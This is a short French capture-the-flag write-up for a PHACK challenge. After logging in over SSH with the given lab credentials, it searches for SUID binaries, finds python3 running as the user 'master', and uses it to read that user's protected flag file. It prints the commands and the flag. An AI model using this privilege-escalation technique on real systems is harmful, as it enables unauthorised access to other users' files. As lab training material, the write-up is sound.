To B, or ! to B - 128 points
Problème
Votre client vous remercie pour votre travail et vous assure qu'il a fait les modifications nécessaires pour améliorer la sécurité de son serveur applicatif.
Prouvez-lui que ce n'est toujours pas suffisant.
=== Connexion SSH ===
Login : padawan
Mdp : padawan
Serveur : toBOrNot2B.phack.fr
Résolution
En arrivant sur le serveur, voici ce qui nous est envoyé:
Bienvenue !
Le flag se trouve dans /home/master/flag.txt
Malheureusement, tu n'as pas les droits de le lire.
Trouves un moyen d'y accéder par toi même.
Bonne chance...
-bash-5.1$
Le challenge porte le tag suid
. Il s'agit probablement d'une escalation de privilèges vers master
ou plus.
On cherche les fichiers avec le bit SUID : find / -perm /4000 2> /dev/null
. Le seul résultat est python3
, qui nous permet d'exécuter du Python en tant que master
.
Reste à l'utiliser pour lire le flag :
-bash-5.1$ cd ../master/
-bash-5.1$ python3 -c "with open('./flag.txt','r') as f: print(f.read())"
PHACK{U_4r3_hiM_bu7_h3's_n07_U}
Flag: PHACK{U_4r3_hiM_bu7_h3's_n07_U}